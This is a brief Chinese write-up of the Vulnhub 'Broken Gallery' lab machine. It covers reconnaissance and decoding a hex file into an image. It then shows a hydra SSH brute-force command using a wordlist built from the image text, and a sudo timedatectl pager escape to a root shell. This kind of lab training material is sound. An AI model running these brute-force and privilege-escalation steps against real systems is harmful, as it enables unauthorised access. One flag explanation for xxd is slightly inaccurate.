【Vulnhub】Broken_Gallery_Tip
前期
靶机地址: https://www.vulnhub.com/entry/broken-gallery,344/
信息收集
端口探测
22、80
80端口
收集网页信息无有用信息
目录爆破也并没有什么有用信息
wget递归下载到本地
wget --recursive --no-parent http://192.168.87.134/
收集图片上的信息
REAMD.md的文件内容都是十六进制的字节码
xxd -r -ps README.md > README.bin
xxd
: 建立一个指定文件或者标准输入的十六进制转储,同时也可以 把十六进制转储转换成原来的二进制形式。同 uuencode(1) 和 uudecode(1) 一样,它也可以把二进制数据转换成 ASCII 表示形式,这样电子邮件就可以 安全的传输。但是它有一个优点,就是可以把解码后的结果输出到 标准输出。同时它还可以用来给二进制文件打补丁。安装vim即可安装该工具。
-r
用于将十六进制格式转换回二进制格式
-p
表示输出纯粹的十六进制编码,而不包括其他信息
-s
用于跳过文件的前N个字节
strings README.bin | head -n 10
strings
: 用于从二进制文件中提取可打印的ASCII字符串。它通常用于查看二进制文件中的文本内容。
可以看到JFIF头,说明这个文件是图片文件,更改为Jpg后缀并打开,是一段文字信息
用exiftool 查看图片信息,没有发现有隐藏的信息
exiftool *.jpg
22端口渗透
根据从图片获取的信息制作一个简易的字典文件尝试爆破SSH
avahamcohen.ac
hello
bob
broken
cheers
hydra -L info.txt -P info.txt ssh://192.168.87.134
提权
GTFOBins 查询 sudo 提权信息
sudo -l
sudo timedatectl list-timezones
!/bin/sh